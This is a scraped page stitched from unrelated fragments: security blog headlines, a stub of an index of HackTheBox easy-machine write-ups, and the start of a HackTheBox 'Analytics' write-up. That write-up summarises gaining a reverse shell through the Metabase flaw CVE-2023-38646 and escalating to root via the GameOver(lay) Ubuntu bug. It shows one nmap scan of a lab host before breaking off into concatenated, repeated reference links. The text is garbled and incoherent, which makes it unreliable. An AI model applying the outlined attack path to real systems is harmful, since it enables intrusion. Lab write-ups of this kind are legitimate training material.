Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
CTF
Analytics / README
ctf_writeups·CVSS 9.8
CVE-2023-38646 [CRITICAL] Analytics / README
# Analytics - HackTheBox - Writeup
Linux, 20 Base Points, Easy
## Machine
## TL;DR
To solve this machine, we start by using `nmap` to enumerate open services and find ports `22`, and `3000`.
***User***: Identified the subdomain `data.analytics.htb` hosting Metabase. Exploited `CVE-2023-38646` to acquire a reverse shell as the `metabase` user. Discovered the password of the `metalytics` user in the `env`.
***Root***: Leveraged the OS version to execute GameOver(lay) Ubuntu Privilege Escalation, resulting in obtaining a `root` shell.
## Analytics Solution
### User
Let's begin by using `nmap` to scan the target machine:
```console
┌─[evyatar9@parrot]─[/hackthebox/Analytics]
└──╼ $ nmap -sV -sC -oA nmap/Analytics 10.10.11.233
# Nmap 7.93 scan initiated Sat Jan 6 23:15:29 2024 as:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640https://lists.ubuntu.com/archives/kernel-team/2023-July/140923.htmlhttps://ubuntu.com/security/notices/USN-6250-1https://wiz.io/blog/ubuntu-overlayfs-vulnerabilityhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640https://lists.ubuntu.com/archives/kernel-team/2023-July/140923.htmlhttps://ubuntu.com/security/notices/USN-6250-1https://wiz.io/blog/ubuntu-overlayfs-vulnerability
2023-07-26
Published
Exploited in the wild